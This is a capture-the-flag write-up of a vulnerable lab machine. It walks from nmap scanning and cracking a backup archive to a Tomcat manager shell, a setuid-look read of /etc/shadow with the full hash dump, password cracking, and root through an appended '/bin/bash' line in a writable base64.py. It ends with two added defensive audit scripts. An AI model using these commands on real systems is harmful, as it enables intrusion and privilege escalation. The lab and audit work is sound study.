1. Find the target's IP: 192.168.164.133
nmap -sn 192.168.164.0/24
2. Port-scan the target: ports 22, 80 and 8080 are open.
3. Port 80 serves the default Apache page and 8080 the default Tomcat page. 8080 felt a lot like the previous vulnhub write-up, but the brute-force module did not find a username and password, so the only option was directory scanning. On port 8080 this turned up a backup.zip file.
Extracting it requires a password; cracking it with john gives @administrator_hi5
zip2john backup.zip > backup.john
john --wordlist=/usr/share/wordlists/rockyou.txt backup.john
After extraction, tomcat-users.xml contains the manager credentials admin/melehifokivai. From here the steps are the same as in the previous vulnhub write-up: use the module
exploit/multi/http/tomcat_mgr_upload
and get a shell.
4. The shell runs as the tomcat user. /home contains the users jaye and randy; jaye's directory is not readable, but randy's is.
notes.txt:
Hey randy this is your system administrator, hope your having a great day! I just wanted to let you know
that I changed your permissions for your home directory. You won't be able to remove or add files for now.
I will change these permissions later on.
See you next Monday randy!
The first flag, user.txt:
ca73a018ae6908a7d0ea5d1c269ba4b6
There is also a randombase64.py file owned by root and not readable by other users.
5. Nothing else to go on at this point, so try the credentials already obtained against the other accounts: jaye/melehifokivai logs in over ssh. In the Files folder of jaye's home directory there is a look binary with the setuid bit set and execute permission for others.
GTFOBins shows that look can only be used for a privileged file read.
Read /etc/shadow, copy it locally and crack it with john:
root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::
irc:*:18858:0:99999:7:::
gnats:*:18858:0:99999:7:::
nobody:*:18858:0:99999:7:::
systemd-network:*:18858:0:99999:7:::
systemd-resolve:*:18858:0:99999:7:::
systemd-timesync:*:18858:0:99999:7:::
messagebus:*:18858:0:99999:7:::
syslog:*:18858:0:99999:7:::
_apt:*:18858:0:99999:7:::
tss:*:18858:0:99999:7:::
uuidd:*:18858:0:99999:7:::
tcpdump:*:18858:0:99999:7:::
avahi-autoipd:*:18858:0:99999:7:::
usbmux:*:18858:0:99999:7:::
rtkit:*:18858:0:99999:7:::
dnsmasq:*:18858:0:99999:7:::
cups-pk-helper:*:18858:0:99999:7:::
speech-dispatcher:!:18858:0:99999:7:::
avahi:*:18858:0:99999:7:::
kernoops:*:18858:0:99999:7:::
saned:*:18858:0:99999:7:::
nm-openvpn:*:18858:0:99999:7:::
hplip:*:18858:0:99999:7:::
whoopsie:*:18858:0:99999:7:::
colord:*:18858:0:99999:7:::
geoclue:*:18858:0:99999:7:::
pulse:*:18858:0:99999:7:::
gnome-initial-setup:*:18858:0:99999:7:::
gdm:*:18858:0:99999:7:::
sssd:*:18858:0:99999:7:::
randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
systemd-coredump:!!:18886::::::
tomcat:$6$XD2Bs.tL01.5OT2b$.uXUR3ysfujHGaz1YKj1l9XUOMhHcKDPXYLTexsWbDWqIO9ML40CQZPI04ebbYzVNBFmgv3Mpd3.8znPfrBNC1:18888:0:99999:7:::
sshd:*:18887:0:99999:7:::
jaye:$6$Chqrqtd4U/B1J3gV$YjeAWKM.usyi/JxpfwYA6ybW/szqkiI1kerC4/JJNMpDUYKavQbnZeUh4WL/fB/4vrzX0LvKVWu60dq4SOQZB0:18887:0:99999:7:::
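The dump above mixes a handful of real hashes into dozens of locked service accounts (`*`, `!`, `!!`). As an added defensive example (not part of the original write-up), the following parser reads the /etc/shadow format, separates locked accounts from those holding a password hash, reports the hash algorithm from the `$id$` prefix, converts the last-change field (days since 1970-01-01) to a date, and flags accounts still on fast legacy algorithms. The sample lines are constructed to mirror the layout above; the hash strings are dummies.

```python
"""Classify /etc/shadow entries: locked vs. hashed, and which algorithm.
Added example, not part of the original write-up."""
import datetime
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample in /etc/shadow format; hash strings are dummies.
SAMPLE_SHADOW = """\
root:$6$dummysalt$dummyhash0000000000000000:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
speech-dispatcher:!:18858:0:99999:7:::
systemd-coredump:!!:18886::::::
randy:$6$othersalt$dummyhash1111111111111111:18888:0:99999:7:::
legacy:$1$md5salt$dummyhash22222222222:15000:0:99999:7:::
"""

# crypt(3) algorithm ids; anything else is reported as unknown(id).
ALGORITHMS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}

# Fast algorithms with no tunable cost: these fall first to a wordlist run.
WEAK_ALGORITHMS = {"descrypt", "md5crypt"}


@dataclass
class ShadowEntry:
    user: str
    status: str                  # "hashed", "locked" or "empty"
    algorithm: Optional[str]     # None unless status == "hashed"
    last_change: Optional[str]   # ISO date, or None when the field is blank


def days_to_date(days: str) -> Optional[str]:
    """Field 3 of shadow is days since the Unix epoch; blank means unset."""
    if not days:
        return None
    epoch = datetime.date(1970, 1, 1)
    return (epoch + datetime.timedelta(days=int(days))).isoformat()


def classify_hash(field: str) -> Tuple[str, Optional[str]]:
    """Return (status, algorithm) for the password field."""
    if field == "":
        return "empty", None            # no password at all: login without one
    if field.startswith(("*", "!")):
        return "locked", None           # '*' never set, '!'/'!!' locked/expired
    if field.startswith("$"):
        algo_id = field.split("$")[1]
        return "hashed", ALGORITHMS.get(algo_id, f"unknown({algo_id})")
    return "hashed", "descrypt"         # legacy 13-character DES crypt


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow(5) lines; every line must carry exactly nine fields."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line: {line!r}")
        status, algo = classify_hash(fields[1])
        entries.append(ShadowEntry(fields[0], status, algo, days_to_date(fields[2])))
    return entries


def weak_hash_accounts(entries: List[ShadowEntry]) -> List[str]:
    """Users whose hash uses a fast legacy algorithm and should be re-hashed."""
    return [e.user for e in entries
            if e.status == "hashed" and e.algorithm in WEAK_ALGORITHMS]


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW):
        print(f"{e.user:20} {e.status:7} {e.algorithm or '-':12} {e.last_change or '-'}")
    print("weak:", weak_hash_accounts(parse_shadow(SAMPLE_SHADOW)))
```

Run against a real file with `sudo cat /etc/shadow | python3 shadow_audit.py` after swapping `SAMPLE_SHADOW` for `sys.stdin.read()`. On the box above, the same logic would show that only root, randy, tomcat and jaye carry hashes, all sha512crypt, and that the real exposure was the setuid `look` binary that let an unprivileged user read the file at all.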
6. After a long crack, the password of the other user randy finally comes out: 07051986randy
7. ssh in as randy and list the allowed commands with sudo -l
randy may run the randombase64.py mentioned earlier with python3.8. From the earlier notes.txt and the file permissions, only root can modify the script itself, but the script imports the base64 module.
8. Locate base64.py
and append a line that spawns /bin/bash:
echo "import os;os.system('/bin/bash')" >> /usr/lib/python3.8/base64.py
9. Finally run the script with sudo, get root and the final flag.
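The root cause in steps 7 to 9 is not the sudo rule on the script but the import path of the interpreter it runs: locking down randombase64.py and randy's home directory (the notes.txt change) does nothing while a module the script imports lives in a directory or file that a non-root user can write. As an added defensive example (not part of the original write-up), the audit below asks a given interpreter for its sys.path, stats every directory and the named stdlib modules inside it, and reports anything not owned by root or carrying group/other write bits. The sample stat map, the module list and the interpreter path are constructed assumptions.

```python
"""Audit the import path of a Python interpreter that sudo lets a user run.
Added example, not part of the original write-up."""
import os
import stat
import subprocess
import sys
from typing import Dict, List, Tuple

# path -> (mode, uid, is_dir); keeps the decision logic testable offline.
StatMap = Dict[str, Tuple[int, int, bool]]

# Constructed sample resembling the box: root-owned stdlib directory with
# 0755, but base64.py inside it left world-writable (0666).
CONSTRUCTED_SAMPLE: StatMap = {
    "/usr/lib/python3.8": (0o040755, 0, True),
    "/usr/lib/python3.8/base64.py": (0o100666, 0, False),
    "/home/randy": (0o040755, 0, True),          # script dir, root-owned
}


def non_root_can_write(mode: int, uid: int) -> bool:
    """Hijackable if a non-root account owns the path or if the group/other
    write bits are set; root-owned 0644/0755 is the expected state."""
    return uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(stats: StatMap) -> List[Tuple[str, str]]:
    """Return (path, reason) for every import-path entry a user could alter."""
    findings = []
    for path, (mode, uid, is_dir) in sorted(stats.items()):
        if non_root_can_write(mode, uid):
            kind = "directory" if is_dir else "module file"
            findings.append((path, f"{kind} writable by a non-root user"))
    return findings


def collect_stats(python: str, modules: Tuple[str, ...] = ("base64",)) -> StatMap:
    """Run the interpreter named in the sudo rule, read its sys.path, and stat
    each directory plus the given modules within it.  The empty entry that
    `-c` produces (current directory) is skipped; when auditing a script, add
    the script's own directory, which Python puts first on sys.path."""
    out = subprocess.run([python, "-c", "import sys; print('\\n'.join(sys.path))"],
                         capture_output=True, text=True, check=True).stdout
    stats: StatMap = {}
    for directory in out.splitlines():
        if not directory or not os.path.isdir(directory):
            continue
        st = os.stat(directory)
        stats[directory] = (st.st_mode, st.st_uid, True)
        for mod in modules:
            candidate = os.path.join(directory, mod + ".py")
            if os.path.isfile(candidate):
                st = os.stat(candidate)
                stats[candidate] = (st.st_mode, st.st_uid, False)
    return stats


def demo() -> List[Tuple[str, str]]:
    """Audit the constructed sample; the only finding is the module file."""
    return audit(CONSTRUCTED_SAMPLE)


if __name__ == "__main__":
    # Assumed: argv[1] is the interpreter from the sudoers entry (e.g. /usr/bin/python3.8).
    target = sys.argv[1] if len(sys.argv) > 1 else sys.executable
    for path, reason in audit(collect_stats(target)):
        print(f"{reason}: {path}")
```

Running `python3 audit_sudo_python.py /usr/bin/python3.8` on the box would have flagged `/usr/lib/python3.8/base64.py` before anyone appended to it. Fixing the permissions is the real remedy; `python3 -I` (isolated mode) removes the environment and current-directory vectors from sys.path but does not help when the stdlib itself is writable.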